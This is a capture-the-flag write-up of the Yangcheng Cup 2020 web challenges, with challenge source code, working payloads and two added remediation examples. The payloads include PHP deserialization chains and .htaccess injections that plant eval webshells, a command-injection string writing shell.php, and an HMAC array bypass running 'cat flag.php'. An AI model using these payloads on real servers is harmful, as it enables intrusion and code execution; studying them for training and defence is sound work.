2020-12-10
Yangcheng Cup (羊城杯) 2020 Web Writeup
I had no time to play when the CTF ran; now that the challenges have been open-sourced on GitHub, I am taking a casual look at them.
easycon
Connect to the one-liner webshell with AntSword (蚁剑) and download the file bbbbbbbbb.txt. It is a base64-encoded image with its header stripped; add the header back and decode it.
easyser
Honestly, the hint for this one is far too obscure: read the file ser.php through an insecure protocol. After fuzzing for ages, it turned out the source is read via http://127.0.0.1/star1.php.
ser.php
```php
<?php
error_reporting(0);
if ($_SERVER['REMOTE_ADDR'] == "127.0.0.1") {
    highlight_file(__FILE__);
}
$flag = '{Trump_:"fake_news!"}';

class GWHT {
    public $hero;
    public function __construct() {
        $this->hero = new Yasuo;
    }
    public function __toString() {
        if (isset($this->hero)) {
            return $this->hero->hasaki();
        } else {
            return "You don't look very happy";
        }
    }
}

class Yongen {
    public $file;
    public $text;
    public function __construct($file = '', $text = '') {
        $this->file = $file;
        $this->text = $text;
    }
    public function hasaki() {
        $d = '<?php die("nononon");?>';
        $a = $d . $this->text;
        @file_put_contents($this->file, $a);
    }
}

class Yasuo {
    public function hasaki() {
        return "I'm the best happy windy man";
    }
}
```
POP chain construction plus bypassing the exit
```php
<?php
class GWHT {
    public $hero;
}

class Yongen {
    public $file = "php://filter/convert.base64-decode/resource=aaa.php";
    public $text = "aaaPD9waHAgZXZhbCgkX1BPU1Rbc10pOyAgPz4=";
}

$a = new GWHT;
$a->hero = new Yongen;
echo urlencode(serialize($a));
```
easyphp
Code audit
```php
<?php
$files = scandir('./');
foreach ($files as $file) {
    if (is_file($file)) {
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}

if (!isset($_GET['content']) || !isset($_GET['filename'])) {
    highlight_file(__FILE__);
    die();
}

$content = $_GET['content'];
if (stristr($content, 'on') || stristr($content, 'html') || stristr($content, 'type') || stristr($content, 'flag') || stristr($content, 'upload') || stristr($content, 'file')) {
    echo "Hacker";
    die();
}

$filename = $_GET['filename'];
if (preg_match("/[^a-z\.]/", $filename) == 1) {
    echo "Hacker";
    die();
}

$files = scandir('./');
foreach ($files as $file) {
    if (is_file($file)) {
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}

file_put_contents($filename, $content . "\nHello, world");
?>
```
My first instinct was to overwrite index.php, but there appears to be no write permission on it, so the challenge most likely revolves around the .htaccess file.
First approach: write a shell into .htaccess and have it included via auto_prepend_file. The keyword file is banned, but that can be bypassed with a line break; the payload has to end with a \ so that the \n appended to content is absorbed as a line continuation.
```text
?filename=.htaccess&content=php_value%20auto_prepend_fil\%0ae%20.htaccess%0a%23<?php%20system('cat%20/fl[a]g');?>\
```
Second approach: again abuse the .htaccess file, but this time use php_value to set the backtracking limit that preg_match works under:
```apache
php_value pcre.backtrack_limit 0
php_value pcre.jit 0
```
First write the .htaccess:
```text
?content=php_value%20pcre.backtrack_limit%200%0aphp_value%20pcre.jit%200%0a%23\&filename=.htaccess
```
Then write the one-liner directly through the php://filter pseudo-protocol:
```text
?filename=php://filter/write=convert.base64-decode/resource=.htaccess&content=cGhwX3ZhbHVlIHBjcmUuYmFja3RyYWNrX2xpbWl0IDAKcGhwX3ZhbHVlIHBjcmUuaml0IDAKcGhwX3ZhbHVlIGF1dG9fYXBwZW5kX2ZpbGUgLmh0YWNjZXNzCiM8P3BocCBldmFsKCRfR0VUWzFdKTs/Plw&1=phpinfo();
```
easyphp2
robots.txt hints at check.php.
Read the source through a pseudo-protocol:
https://www.php.net/manual/zh/filters.convert.php
```text
http://localhost:8080/?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php
```
GWHT.php
```php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>count is here</title>
    <style>
        html, body {
            overflow: none;
            max-height: 100vh;
        }
    </style>
</head>
<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">
    <center><img src="question.jpg" height="200" width="200" /></center>
    <?php
    ini_set('max_execution_time', 5);
    if ($_COOKIE['pass'] !== getenv('PASS')) {
        setcookie('pass', 'PASS');
        die('<h2>' . '<hacker>' . '<h2>' . '<br>' . '<h1>' . '404' . '<h1>' . '<br>' . 'Sorry, only people from GWHT are allowed to access this website.' . '23333');
    }
    ?>
    <h1>A Counter is here, but it has someting wrong</h1>
    <form>
        <input type="hidden" value="GWHT.php" name="file">
        <textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
        <input type="submit">
    </form>
    <?php
    if (isset($_GET["count"])) {
        $count = $_GET["count"];
        if (preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)) {
            die('hacker!');
        }
        echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
    }
    ?>
</body>
</html>
```
check.php
```php
<?php
$pass = "GWHT";
echo "Here is nothing, isn't it ?";
header('Location: /');
```
From the source we learn that the Cookie value is GWHT; what remains is the command execution in exec('printf \'' . $count . '\' | wc -c').
exec() returns no output to the page, so write a shell directly:
```text
1'| echo "<?=eval(\$_POST['shell'])?>" > shell.php ||'
```
There is also another way to bypass the base64 keyword filter: %6%32. Here %32 is the character 2, so the pieces concatenate into %62, which is the letter b.
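The counter in GWHT.php breaks because the user value is dropped between literal single quotes and also serves as printf's format string. Below is an added example (not from the writeup or the challenge) that builds the same command string the challenge-style way and two fixed ways; the input is constructed and the helper names are my own.

```php
<?php
// Added example, not code from the writeup or the challenge. It contrasts the
// challenge's hand-written shell quoting with two fixes. The input below is
// constructed and stands for what the counter in GWHT.php receives via ?count=.

// Challenge style: the value sits between literal single quotes, so a single
// quote inside $count closes the quoting and whatever follows is parsed by
// the shell. The blocklist (;, base64, ...) does nothing against this, and the
// value is also used as printf's format string.
function buildUnsafeCommand(string $count): string {
    return 'printf \'' . $count . '\' | wc -c';
}

// Fix 1: let PHP do the quoting. escapeshellarg() wraps the value in single
// quotes and rewrites every embedded ' as '\'', so the shell sees exactly one
// argument; passing %s as the format keeps the value out of the format string.
function buildSafeCommand(string $count): string {
    return 'printf %s ' . escapeshellarg($count) . ' | wc -c';
}

// Fix 2: no shell at all. strlen() counts bytes, which is what `wc -c`
// reports, so the subprocess (and the injection surface) disappears.
function countBytes(string $count): int {
    return strlen($count);
}

$input = "1'| echo test > /tmp/x ||'";   // constructed quote-breaking value
echo buildUnsafeCommand($input), "\n";  // the second command is exposed to the shell
echo buildSafeCommand($input), "\n";    // the whole value is one quoted argument
echo countBytes($input), "\n";
```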
BlackCat
The homepage tells you to listen to a song. Download the MP3 and open it in 010 Editor: PHP code is hidden at the end of the file.
Copy it into Sublime to audit:
```php
<?php
if (empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])) {
    die('Ë£¡¾¹¸Ò²ÈÎÒÒ»Ö»¶úµÄβ°Í£¡');
}

$clandestine = getenv("clandestine");

if (isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);

$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

if ($hh !== $_POST['Black-Cat-Sheriff']) {
    die('ÓÐÒâÃé×¼£¬ÎÞÒâ»÷·¢£¬ÄãµÄÃÎÏë¾ÍÊÇÄãÒªÃé×¼µÄÄ¿±ê¡£ÏàÐÅ×Ô¼º£¬Äã¾ÍÊÇÄÇ¿ÅÉäÖаÐÐĵÄ×Óµ¯¡£');
}

echo exec("nc" . $_POST['One-ear']);
```
The Chinese strings are mojibake, but that does not affect the audit. The first Note in the official hash_hmac documentation describes a trick: if the second parameter is an array, the function raises a warning and returns NULL, which effectively makes the $clandestine parameter attacker-controlled. Payload:
```text
White-cat-monitor[]=1&One-ear=;cat flag.php&Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6
```
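Why the array trick works, and what a fixed check looks like: the added example below (not code from the writeup or the challenge) reproduces the BlackCat verification once as written and once hardened, with the request and secret constructed so it runs from the CLI on PHP 7.x.

```php
<?php
// Added example, not code from the writeup or the challenge. The $_POST values
// and the secret below are constructed; the function names are my own.

// Challenge-style check. On PHP 7.x, hash_hmac() given an array as $data emits
// a warning and returns NULL; NULL is then coerced to "" as the key of the next
// hash_hmac(), so the final MAC depends only on public data and can be forged.
// (PHP 8 throws a TypeError here instead, which is a crash rather than a bypass.)
function weakVerify(array $post, string $secret): bool {
    $key = $secret;
    if (isset($post['White-cat-monitor'])) {
        $key = @hash_hmac('sha256', $post['White-cat-monitor'], $key); // NULL for array input
    }
    $hh = hash_hmac('sha256', $post['One-ear'], $key);
    return $hh === $post['Black-Cat-Sheriff'];
}

// Hardened check: every untrusted field must be a string, a failed key
// derivation aborts instead of silently weakening the key, and the MAC is
// compared in constant time with hash_equals().
function safeVerify(array $post, string $secret): bool {
    foreach (['Black-Cat-Sheriff', 'One-ear', 'White-cat-monitor'] as $field) {
        if (isset($post[$field]) && !is_string($post[$field])) {
            return false; // an array in a scalar field is hostile input
        }
    }
    $key = $secret;
    if (isset($post['White-cat-monitor'])) {
        $key = hash_hmac('sha256', $post['White-cat-monitor'], $key);
        if (!is_string($key) || $key === '') {
            return false;
        }
    }
    $expected = hash_hmac('sha256', $post['One-ear'], $key);
    return hash_equals($expected, $post['Black-Cat-Sheriff']);
}

// Constructed request: the sender does not know $secret, submits an array for
// White-cat-monitor, and supplies a MAC computed with the empty key.
$secret = 'placeholder-server-secret';
$forged = [
    'White-cat-monitor' => [1],
    'One-ear'           => 'hello',
    'Black-Cat-Sheriff' => hash_hmac('sha256', 'hello', ''),
];
var_dump(weakVerify($forged, $secret)); // accepted on PHP 7.x: the NULL key collapses to ""
var_dump(safeVerify($forged, $secret)); // rejected: array field fails the type check
```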